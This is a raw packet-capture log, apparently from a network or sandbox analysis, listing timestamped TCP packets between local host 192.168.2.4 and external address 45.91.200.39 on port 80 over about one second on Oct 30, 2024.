Oct 30, 2024 19:47:03.855392933 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.855406046 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.855418921 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.855431080 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.855443001 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.855494976 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.855535030 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.855712891 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.855760098 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.856755972 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.856766939 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.856806993 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.856892109 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.856935024 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.857027054 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.857038021 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.857050896 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.857064009 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.857079029 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.857093096 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.857258081 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.857268095 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.857301950 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.857867002 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.857877016 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.857922077 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.858031988 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.858072996 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.940697908 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.940741062 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.940759897 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.940907001 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.941126108 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.972343922 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.972357988 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.972374916 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.972385883 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.972397089 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.972433090 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.972491980 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.972502947 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.972546101 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.972574949 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.972584963 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.972625017 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.972868919 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.972879887 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.972891092 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.972923040 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.972944021 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.973016024 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.973026037 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.973067999 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.973469973 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.973519087 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.973526001 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.973536968 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.973583937 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.973604918 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.973656893 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.973964930 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.973974943 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.973984003 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:03.974016905 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:03.974040985 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.057487011 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.057503939 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.057514906 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.057580948 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.089521885 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.089539051 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.089550018 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.089616060 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.089648008 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.089649916 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.089658022 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.089668989 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.089687109 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.089688063 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.089699030 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.089711905 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.089739084 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.090028048 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.090053082 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.090063095 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.090069056 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.090095997 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.090270042 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.090308905 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.090325117 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.090336084 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.090358019 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.090368986 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.090398073 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.090435028 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.090766907 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.090810061 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.090892076 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.090902090 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.090924978 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.090934992 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.090939045 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.090946913 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.090958118 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.090967894 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.090991974 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.174664021 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.174684048 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.174695015 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.174705029 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.174751997 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.174777985 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.207860947 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.207876921 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.207890034 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.207978964 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.208167076 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.208184958 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.208198071 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.208209991 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.208220005 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.208225012 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.208256006 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.208283901 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.208556890 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.208570004 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.208584070 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.208659887 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.208671093 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.208683968 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.208698034 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.208772898 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.208909988 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.208956957 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.209048986 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.209091902 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.209115982 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.209125996 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.209152937 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.209165096 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.209580898 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.209628105 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.291834116 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.291886091 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.291927099 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.291922092 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.292009115 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.292009115 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.324939013 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.324975014 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.325018883 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.325032949 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.325051069 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.325081110 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.325124025 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.325135946 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.325148106 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.325160027 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.325160027 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.325172901 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.325186014 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.325212002 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.325337887 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.325376034 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.325572968 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.325618029 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.325723886 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.325736046 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.325762033 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.325768948 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.325777054 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.325782061 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.325818062 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.326195955 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.326206923 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.326219082 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.326246977 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.326262951 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.326303005 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.326313972 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.326325893 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.326337099 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.326345921 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.326365948 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.326390028 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.326416016 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.326455116 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.408497095 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.408561945 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.408592939 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.408601046 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.408629894 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.408642054 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.408642054 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.408678055 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.441993952 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.442049980 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.442084074 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.442132950 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.442167997 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.442200899 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.442209959 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.442235947 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.442241907 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.442267895 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.442270994 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.442296982 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.442318916 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.442321062 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.442356110 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.442368984 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.442406893 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.442959070 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.443010092 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.443018913 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.443047047 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.443057060 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.443079948 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.443089962 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.443114996 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.443125010 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.443150043 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.443159103 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.443192959 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.443275928 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.443336964 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.443347931 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.443382025 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.443399906 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.443424940 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.443466902 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.443500042 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.443520069 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.443536043 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.443546057 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.443572044 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.443583012 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.443614960 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.443694115 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.443747997 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.537672997 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.537723064 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.537761927 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.537823915 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.538819075 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.559386015 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.559400082 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.559411049 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.559454918 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.559463978 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.559465885 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.559477091 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.559489012 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.559490919 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.559514999 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.559545994 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.559664011 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.559676886 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.559709072 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.559736013 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.559849977 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.559860945 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.559870958 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.559951067 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.559961081 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.559973001 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.559984922 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.560071945 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.560205936 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.560251951 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.560659885 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.560671091 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.560681105 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.560693026 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.560714006 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.560734987 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.560801029 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.560811043 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.560825109 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.560834885 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.560834885 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.560863018 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.560889959 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.648529053 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.648545027 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.648555040 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.648777008 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.676289082 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.676302910 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.676312923 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.676386118 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.676422119 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.676433086 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.676443100 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.676455021 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.676487923 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.676501036 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.676590919 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.676600933 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.676610947 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.676623106 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.676635027 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.676644087 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.676660061 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.676678896 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.676786900 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.676831961 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.677284956 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.677294970 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.677304983 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.677345037 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.677371979 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.677416086 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.677427053 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.677436113 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.677449942 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.677467108 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.677493095 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.677606106 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.677617073 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.677628994 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.677659988 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.677671909 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.678184986 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.678239107 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.678240061 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.678251028 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.678289890 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.765594959 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.765688896 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.765712023 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.765727043 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.765738964 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.765784025 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.793457985 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.793505907 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.793534040 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.793546915 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:04.793559074 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:04.793586016 CET	49730	80	192.168.2.4	45.91.200.39
